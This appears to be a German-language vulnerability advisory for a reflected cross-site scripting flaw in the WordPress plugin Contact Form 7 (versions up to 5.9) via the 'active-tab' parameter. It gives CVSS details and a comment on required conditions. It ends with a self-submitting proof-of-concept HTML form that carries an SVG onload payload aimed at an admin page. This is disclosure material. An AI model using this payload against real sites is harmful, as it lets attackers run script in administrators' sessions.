
Contact Form 7 <= 5.9 - Reflektiertes Cross-Site Scripting
Contact Form 7 <= 5.9 - Reflektiertes Cross-Site-Scripting
Das WordPress-Plugin Contact Form 7 ist in allen Versionen bis einschließlich 5.9 anfällig für reflektiertes Cross-Site-Scripting über den Parameter „active-tab“, da die Eingaben unzureichend bereinigt und die Ausgaben unzureichend escaped werden. Dadurch ist es nicht authentifizierten Angreifern möglich, beliebige Web-Skripte in Seiten einzuschleusen, die ausgeführt werden, wenn sie einen Benutzer erfolgreich dazu verleiten können, eine Aktion wie das Klicken auf einen Link auszuführen.
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13
Man muss den Post-ID-Wert der Seite kennen, auf der sich das Formular befindet, sonst funktioniert es nicht, wenn der Admin auf den Link klickt. Insgesamt sollte dies „Privileges Required“ auf H gesetzt sein, da ein Admin auf den Link klicken muss.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin.php">
<input type="hidden" name="page" value="wpcf7" />
<input type="hidden" name="post" value="4478" />
<input type="hidden" name="active-tab" value="'"><svg/onload=prompt(7);>{{7*7}}" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>